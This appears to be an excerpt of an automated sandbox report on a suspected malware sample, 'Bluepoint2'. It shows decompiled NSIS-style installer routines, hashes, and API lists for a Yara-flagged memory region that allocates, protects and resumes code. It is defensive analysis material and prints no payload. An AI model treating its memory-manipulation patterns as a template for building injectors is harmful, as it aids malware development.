                                                                                                                                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                                                                                                    0x004069a9
                                                                                                                                    0x004069b2
                                                                                                                                    0x00000000
                                                                                                                                    0x004069bf
                                                                                                                                    0x004069b5
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(77133420,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,77133420,?,77132EE0,00405D94,?,77133420,77132EE0), ref: 004069A9
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                                                                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336C8B9 Relevance: 1.8, APIs: 1, Instructions: 287memorynativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0336BCFF: LoadLibraryA.KERNELBASE(00000000,?,?,0335D65D,-17CD9789,0336A4C7,00000000), ref: 0336BDF7
                                                                                                                                    • NtAllocateVirtualMemory.NTDLL ref: 0336CB29
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2616484454-0
                                                                                                                                    • Opcode ID: 93b1b6dd933d62681c890bc99ee2cbb50d1d660512c6caf4cc31d546dd0cd955
                                                                                                                                    • Instruction ID: 4e86754c510565b958bcf1342676b9d5359e94897a952fff5234b122b09ec4bf
                                                                                                                                    • Opcode Fuzzy Hash: 93b1b6dd933d62681c890bc99ee2cbb50d1d660512c6caf4cc31d546dd0cd955
                                                                                                                                    • Instruction Fuzzy Hash: 83A1BA316083888FCB25CE34CD987EA7BA2EF863A0F59855DDCC54F656C331498ACB42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 033656E9 Relevance: 1.8, APIs: 1, Instructions: 287libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNELBASE(00000000,?,?,0335D65D,-17CD9789,0336A4C7,00000000), ref: 0336BDF7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 716cdc66f6f716b917d606928ca737b9dfe9cf9a646ce2d39ddf85d749344460
                                                                                                                                    • Instruction ID: ca488195254bb9580961015bc795ca000e577b36cdd2e253aede516c2a0ed861
                                                                                                                                    • Opcode Fuzzy Hash: 716cdc66f6f716b917d606928ca737b9dfe9cf9a646ce2d39ddf85d749344460
                                                                                                                                    • Instruction Fuzzy Hash: 97A18671608349CFDB25DF38C8E87EA7BA5EF46790F45806EDC869B619C3308986CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336EBFB Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtResumeThread.NTDLL(00000001,0336F30F,-17CD9789,0336A4C7,00000000), ref: 0336EEC4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: 87dca9be2b4bbed499fb47e10a049507506e82e9438b4b9fbf2051f00708e0b4
                                                                                                                                    • Instruction ID: c2099869964766a5860a847b5bd10cb6f5c432f2fbf7554a84e541bc95413330
                                                                                                                                    • Opcode Fuzzy Hash: 87dca9be2b4bbed499fb47e10a049507506e82e9438b4b9fbf2051f00708e0b4
                                                                                                                                    • Instruction Fuzzy Hash: EB11C03D244309CFCB25CD64CBE83E9376EAF86384F15C22ACD468BA1DD73A454C8A01
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336B329 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileA.KERNELBASE(?,1781A7AF), ref: 0336B5E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: f8cf64c0b74aca0fd2b958d7a3e8ec5e12ad583d50ba432fcfad448fba763c6f
                                                                                                                                    • Instruction ID: 401a9113d23bd93b7f7220da4d9391e31debc56dc35efd2f00534f1eeae58317
                                                                                                                                    • Opcode Fuzzy Hash: f8cf64c0b74aca0fd2b958d7a3e8ec5e12ad583d50ba432fcfad448fba763c6f
                                                                                                                                    • Instruction Fuzzy Hash: E511867611C304DFC7687E39C892ABAFBB5EF50240F12891ED5D386924E3A006C58F1B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0336E61C Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtProtectVirtualMemory.NTDLL ref: 0336E6FD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2706961497-0
                                                                                                                                    • Opcode ID: c978f16bdfcb5c3dcd62a9b2f3ded7feb577082e0913eea543aa919f65b55cb2
                                                                                                                                    • Instruction ID: 26980725f35a0ac42fa0ede971c5d664df54e72af96c2abe54f0cd1eb20a34c9
                                                                                                                                    • Opcode Fuzzy Hash: c978f16bdfcb5c3dcd62a9b2f3ded7feb577082e0913eea543aa919f65b55cb2
                                                                                                                                    • Instruction Fuzzy Hash: 630146756082459FDF24DE68C998AEABAA6FF9C380F85842DDD8D97204C3305A01CA22
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0335E7AF Relevance: .2, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Offset: 03350000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_3350000_Bluepoint2.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ca619a68e2f2c5de29e8863dd3ca120b71ba55db4118b6d853993c411233b1bf
                                                                                                                                    • Instruction ID: 2b14b4e638c1c15afe50e89a0182022e7ce283d756513f621962a7ec3ace41d4
                                                                                                                                    • Opcode Fuzzy Hash: ca619a68e2f2c5de29e8863dd3ca120b71ba55db4118b6d853993c411233b1bf
                                                                                                                                    • Instruction Fuzzy Hash: 3551AA305483899FCB29CF389894AEB7FA5AF46310F19059EED958FA42C7364911CBC2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 143 405031-40507d GetDlgItem * 2 144 405083-40511b GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 143->144 145 4052a8-4052af 143->145 148 40512a-405131 DeleteObject 144->148 149 40511d-405128 SendMessageW 144->149 146 4052b1-4052c1 145->146 147 4052c3 145->147 150 4052c6-4052cf 146->150 147->150 151 405133-40513b 148->151 149->148 152 4052d1-4052d4 150->152 153 4052da-4052e0 150->153 154 405164-405168 151->154 155 40513d-405140 151->155 152->153 156 4053be-4053c5 152->156 157 4052e2-4052e9 153->157 158 4052ef-4052f6 153->158 154->151 161 40516a-40519a call 4045c4 * 2 154->161 159 405142 155->159 160 405145-405162 call 4066a5 SendMessageW * 2 155->160 162 405436-40543e 156->162 163 4053c7-4053cd 156->163 157->156 157->158 164 4052f8-4052fb 158->164 165 40536b-40536e 158->165 159->160 160->154 194 4051a0-4051a6 161->194 195 40526a-40527d GetWindowLongW SetWindowLongW 161->195 171 405440-405446 SendMessageW 162->171 172 405448-40544f 162->172 168 4053d3-4053dd 163->168 169 405629-40563b call 40462b 163->169 173 405306-40531b call 404f7f 164->173 174 4052fd-405304 164->174 165->156 170 405370-40537a 165->170 168->169 178 4053e3-4053f2 SendMessageW 168->178 179 40538a-405394 170->179 180 40537c-405388 SendMessageW 170->180 171->172 182 405451-405458 172->182 183 405483-40548a 172->183 173->165 204 40531d-40532e 173->204 174->165 174->173 178->169 188 4053f8-405409 SendMessageW 178->188 179->156 189 405396-4053a0 179->189 180->179 191 405461-405468 182->191 192 40545a-40545b ImageList_Destroy 182->192 186 405490-40549c call 4011ef 183->186 187 4055eb-4055f2 183->187 215 4054ac-4054af 186->215 216 40549e-4054a1 186->216 187->169 199 4055f4-4055fb 187->199 197 405413-405415 188->197 198 40540b-405411 188->198 200 4053b1-4053bb 189->200 201 4053a2-4053af 189->201 202 405471-40547d 191->202 203 40546a-40546b GlobalFree 191->203 192->191 206 4051a9-4051af 194->206 210 405283-405286 195->210 208 405416-40542f call 401299 SendMessageW 197->208 198->197 198->208 199->169 209 4055fd-405627 ShowWindow GetDlgItem ShowWindow 199->209 200->156 201->156 202->183 203->202 204->165 205 405330-405332 204->205 211 405334-40533b 205->211 212 405345 205->212 213 4051b5-4051e0 206->213 214 40524c-40525f 206->214 208->162 209->169 218 4052a0-4052a3 call 4045f9 210->218 219 405288-40529b ShowWindow call 4045f9 210->219 221 405341-405343 211->221 222 40533d-40533f 211->222 223 405348-405364 call 40117d 212->223 224 4051e2-40521a SendMessageW 213->224 225 40521c-40521e 213->225 214->206 229 405265-405268 214->229 230 4054f0-405514 call 4011ef 215->230 231 4054b1-4054ca call 4012e2 call 401299 215->231 226 4054a3 216->226 227 4054a4-4054a7 call 404fff 216->227 218->145 219->169 221->223 222->223 223->165 224->214 234 405220-405232 SendMessageW 225->234 235 405234-405249 SendMessageW 225->235 226->227 227->215 229->195 229->210 244 4055b6-4055bf 230->244 245 40551a 230->245 251 4054da-4054e9 SendMessageW 231->251 252 4054cc-4054d2 231->252 234->214 235->214 246 4055c1-4055c7 InvalidateRect 244->246 247 4055cd-4055d5 244->247 248 40551d-405528 245->248 246->247 247->187 250 4055d7-4055e6 call 404f52 call 404f3a 247->250 253 40552a-405539 248->253 254 40559e-4055b0 248->254 250->187 251->230 255 4054d4 252->255 256 4054d5-4054d8 252->256 258 40553b-405548 253->258 259 40554c-40554f 253->259 254->244 254->248 255->256 256->251 256->252 258->259 261 405551-405554 259->261 262 405556-40555f 259->262 264 405564-40559c SendMessageW * 2 261->264 262->264 265 405561 262->265 264->254 265->264
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t281;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c)); // executed
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										_t281 = SendMessageW(_v8, 0x1132, 0,  &_v88); // executed
										 *( *0x423740 + _t300 * 4) = _t281;
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}



























































                                                                                                                                    0x00405038
                                                                                                                                    0x00405051
                                                                                                                                    0x00405056
                                                                                                                                    0x0040505e
                                                                                                                                    0x00405064
                                                                                                                                    0x0040507a
                                                                                                                                    0x0040507d
                                                                                                                                    0x004052a8
                                                                                                                                    0x004052af
                                                                                                                                    0x004052c3
                                                                                                                                    0x004052b1
                                                                                                                                    0x004052b3
                                                                                                                                    0x004052b6
                                                                                                                                    0x004052b7
                                                                                                                                    0x004052be
                                                                                                                                    0x004052be
                                                                                                                                    0x004052cf
                                                                                                                                    0x004052dd
                                                                                                                                    0x004052e0
                                                                                                                                    0x004052f6
                                                                                                                                    0x0040536b
                                                                                                                                    0x0040536e
                                                                                                                                    0x00405370
                                                                                                                                    0x0040537a
                                                                                                                                    0x00405388
                                                                                                                                    0x00405388
                                                                                                                                    0x0040538a
                                                                                                                                    0x00405394
                                                                                                                                    0x0040539a
                                                                                                                                    0x0040539d
                                                                                                                                    0x004053a0
                                                                                                                                    0x004053bb
                                                                                                                                    0x004053a2
                                                                                                                                    0x004053ac
                                                                                                                                    0x004053ac
                                                                                                                                    0x004053a0
                                                                                                                                    0x00405394
                                                                                                                                    0x00000000
                                                                                                                                    0x0040536e
                                                                                                                                    0x004052fb
                                                                                                                                    0x00405306
                                                                                                                                    0x0040530b
                                                                                                                                    0x00405312
                                                                                                                                    0x00405317
                                                                                                                                    0x0040531b
                                                                                                                                    0x00405326
                                                                                                                                    0x00405326
                                                                                                                                    0x0040532a
                                                                                                                                    0x0040532e
                                                                                                                                    0x00405332
                                                                                                                                    0x00405345
                                                                                                                                    0x00405334
                                                                                                                                    0x00405334
                                                                                                                                    0x0040533b
                                                                                                                                    0x00405341
                                                                                                                                    0x0040533d
                                                                                                                                    0x0040533d
                                                                                                                                    0x0040533d
                                                                                                                                    0x0040533b
                                                                                                                                    0x00405349
                                                                                                                                    0x0040534b
                                                                                                                                    0x0040535e
                                                                                                                                    0x00405361
                                                                                                                                    0x00405364
                                                                                                                                    0x00405364
                                                                                                                                    0x0040532e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040531b
                                                                                                                                    0x004052fd
                                                                                                                                    0x00405304
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004053be
                                                                                                                                    0x004053be
                                                                                                                                    0x004053c5
                                                                                                                                    0x00405436
                                                                                                                                    0x0040543e
                                                                                                                                    0x00405446
                                                                                                                                    0x00405446
                                                                                                                                    0x0040544f
                                                                                                                                    0x00405451
                                                                                                                                    0x00405458
                                                                                                                                    0x0040545b
                                                                                                                                    0x0040545b
                                                                                                                                    0x00405461
                                                                                                                                    0x00405468
                                                                                                                                    0x0040546b
                                                                                                                                    0x0040546b
                                                                                                                                    0x00405471
                                                                                                                                    0x00405477
                                                                                                                                    0x0040547d
                                                                                                                                    0x0040547d
                                                                                                                                    0x0040548a
                                                                                                                                    0x004055eb
                                                                                                                                    0x004055f2
                                                                                                                                    0x0040560f
                                                                                                                                    0x00405615
                                                                                                                                    0x00405627
                                                                                                                                    0x00405627
                                                                                                                                    0x00000000
                                                                                                                                    0x00405490
                                                                                                                                    0x00405492
                                                                                                                                    0x00405497
                                                                                                                                    0x0040549c
                                                                                                                                    0x004054a1
                                                                                                                                    0x004054a3
                                                                                                                                    0x004054a3
                                                                                                                                    0x004054a4
                                                                                                                                    0x004054a5
                                                                                                                                    0x004054a7
                                                                                                                                    0x004054a7
                                                                                                                                    0x004054af
                                                                                                                                    0x004054f0
                                                                                                                                    0x004054f2
                                                                                                                                    0x00405502
                                                                                                                                    0x00405505
                                                                                                                                    0x0040550a
                                                                                                                                    0x00405511
                                                                                                                                    0x00405514
                                                                                                                                    0x004055b6
                                                                                                                                    0x004055bf
                                                                                                                                    0x004055c7
                                                                                                                                    0x004055c7
                                                                                                                                    0x004055d5
                                                                                                                                    0x004055e6
                                                                                                                                    0x004055e6
                                                                                                                                    0x00000000
                                                                                                                                    0x004055d5
                                                                                                                                    0x0040551a
                                                                                                                                    0x0040551d
                                                                                                                                    0x00405523
                                                                                                                                    0x00405528
                                                                                                                                    0x0040552a
                                                                                                                                    0x0040552c
                                                                                                                                    0x00405532
                                                                                                                                    0x00405539
                                                                                                                                    0x0040553e
                                                                                                                                    0x00405545
                                                                                                                                    0x00405548
                                                                                                                                    0x00405548
                                                                                                                                    0x0040554f
                                                                                                                                    0x0040555b
                                                                                                                                    0x0040555f
                                                                                                                                    0x00405561
                                                                                                                                    0x00405561
                                                                                                                                    0x00405551
                                                                                                                                    0x00405553
                                                                                                                                    0x00405553
                                                                                                                                    0x00405581
                                                                                                                                    0x0040558d
                                                                                                                                    0x0040559c
                                                                                                                                    0x0040559c
                                                                                                                                    0x0040559e
                                                                                                                                    0x004055a1
